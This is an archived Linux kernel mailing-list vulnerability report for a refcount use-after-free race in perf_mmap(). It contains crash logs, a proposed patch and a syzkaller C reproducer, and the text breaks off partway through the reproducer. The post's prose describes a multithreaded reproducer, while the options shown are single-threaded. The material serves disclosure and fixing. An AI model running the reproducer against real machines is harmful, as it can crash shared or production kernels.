greg k-h
|
{
"author": "Greg KH <gregkh@linuxfoundation.org>",
"date": "Sun, 1 Feb 2026 12:49:11 +0100",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
